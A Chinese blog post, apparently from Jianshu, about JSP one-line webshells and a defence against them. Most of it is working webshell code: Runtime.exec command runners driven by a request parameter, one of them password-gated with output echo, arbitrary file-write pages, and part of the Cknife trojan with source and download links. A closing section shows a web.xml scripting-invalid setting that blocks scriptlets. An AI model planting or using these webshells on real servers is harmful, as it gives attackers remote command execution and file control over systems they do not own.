JSP 一句話木馬與防范

0x01 前言

??一句話木馬短小精悍,而且功能強大,隱蔽性非常好,在入侵中始終扮演著強大的作用。

0x02 一句話木馬樣本舉例

一、樣本一

  • 命令執(zhí)行
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

??Runtime 類封裝了運行時的環(huán)境。每個 Java 應用程序都有一個 Runtime 類實例,使應用程序能夠與其運行的環(huán)境相連接。使用 getRuntime() 構建 Runtime 類實例。 getRuntime() 返回與當前 Java 應用程序相關的運行時對象。獲取實例后調用 exec() 方法執(zhí)行系統命令。

??request 為 JSP 內置對象,getParameter() 方法獲取請求參數 cmd的值構建命令 。

請求URL:http://127.0.0.1/shell.jsp?cmd=calc

二、樣本二

  • 命令執(zhí)行
<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>一句話木馬</title>
    </head>

    <body>
        <%
        if ("admin".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>

</html>

??原理與樣本一相同, inputStream() 方法獲取命令回顯輸出到前端頁面中。

請求URL:http://127.0.0.1/shell.jsp?pwd=admin&cmd=calc

三、樣本三

  • 文件寫入
<%
    // ISO-8859-1 輸入
    new java.io.FileOutputStream(request.getParameter("file")).write(request.getParameter("content").getBytes());
    // UTF-8 輸入
    new java.io.FileOutputStream(request.getParameter("file")).write(new String(request.getParameter("content").getBytes("ISO-8859-1"), "UTF-8").getBytes());
    // Web 目錄寫入
    new java.io.FileOutputStream(application.getRealPath("/") + "/" + request.getParameter("filename")).write(request.getParameter("content").getBytes());
    // 功能更加豐富的寫入
    new java.io.RandomAccessFile(request.getParameter("file"),"rw").write(request.getParameter("content").getBytes());
%>

??new FileOutputStream(name, append) 調用 FileOutputStream 類構造函數創(chuàng)建文件,并寫入內容。file 參數為文件全限定名,filename 為文件名,content 為文本內容。

// ISO-8859-1 輸入
請求URL:http://127.0.0.1/input.jsp?file=D:/test.txt&content=test
// UTF-8 輸入
請求URL:http://127.0.0.1/input.jsp?file=D:/test.txt&content=測試內容
// Web 目錄寫入
請求URL:http://127.0.0.1/input.jsp?filename=test.txt&content=test
// 功能更加豐富的寫入
請求URL:http://127.0.0.1/input.jsp?file=D:/test.txt&content=test

四、反射調用外部 Jar 包

  • 菜刀木馬
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!
    String Pwd = "Cknife";
    String cs = "UTF-8";

    String EC(String s) throws Exception {
        return new String(s.getBytes("ISO-8859-1"),cs);
    }

    Connection GC(String s) throws Exception {
        String[] x = s.trim().split("choraheiheihei");
        Class.forName(x[0].trim());
        if(x[1].indexOf("jdbc:oracle")!=-1){
            return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);
        }else{
            Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);
            if (x.length > 4) {
                c.setCatalog(x[4]);
            }
            return c;
        }
    }

    void AA(StringBuffer sb) throws Exception {
        File k = new File("");
        File r[] = k.listRoots();
        for (int i = 0; i < r.length; i++) {
            sb.append(r[i].toString().substring(0, 2));
        }
    }

    // 省略部分代碼,詳情訪問:
    // 源碼:https://github.com/Chora10/Cknife
    // 下載地址:http://pan.baidu.com/s/1nul1mpr  密碼:f65g

        } catch (Exception e) {
            sb.append("ERROR" + ":// " + e.toString());
        }
        sb.append("|" + "<-");
        out.print(sb.toString());
    }
%>

0x03 防范方法

??前提條件:Java Web 應用沒有在 JSP 中直接使用任何 Java 代碼,否則會對應用本身造成影響。

<jsp-config>
    <jsp-property-group>
        <url-pattern>*.jspx</url-pattern>
        <url-pattern>*.jsp</url-pattern>
        <scripting-invalid>true</scripting-invalid>
    </jsp-property-group>
</jsp-config>

??配置生效后,將不允許 Jsp / Jspx 文件中包含任何 scripting ,包括:

<%%> 與 <jsp:scriptlet></jsp:scriptlet>

<%!%> 與 <jsp:declaration></jsp:declaration>

<%=%> 與 <jsp:expression></jsp:expression>

??包括這些的 Jsp / Jspx 文件在編譯的時候將產生編譯錯誤。目前能看見的 Java 的 webshell 全都離不開這幾種語法,所以應該可以說是能夠禁止所有目前已知的 Java WebShell。

參考資料:http://mp.weixin.qq.com/s/-YSSINSZfthYVL1HKUovSg

?著作權歸作者所有,轉載或內容合作請聯系作者
【社區(qū)內容提示】社區(qū)部分內容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內容

  • 1. Java基礎部分 基礎部分的順序:基本語法,類相關的語法,內部類的語法,繼承相關的語法,異常的語法,線程的語...
    子非魚_t_閱讀 34,628評論 18 399
  • JAVA面試題 1、作用域public,private,protected,以及不寫時的區(qū)別答:區(qū)別如下:作用域 ...
    JA尐白閱讀 1,250評論 1 0
  • 最近使用CocoaPods來添加第三方類庫,無論是執(zhí)行pod install還是pod update都卡在了Ana...
    paschal閱讀 697評論 0 50
  • 01.假如愛有天意 當天邊那顆星出現,你可知我又開始想念,有多少愛戀只能遙遙相望,就像月光撒下海面~ 睡眼朦朧,依...
    阿拉半仙閱讀 1,466評論 2 5
  • 廖雪峰寫了一個Python教程,比較基礎,文風也比較口語化,閱讀學習體驗都不錯,推薦給需要者。 本博文記錄閱讀該教...
    redLion閱讀 2,759評論 1 4

友情鏈接更多精彩內容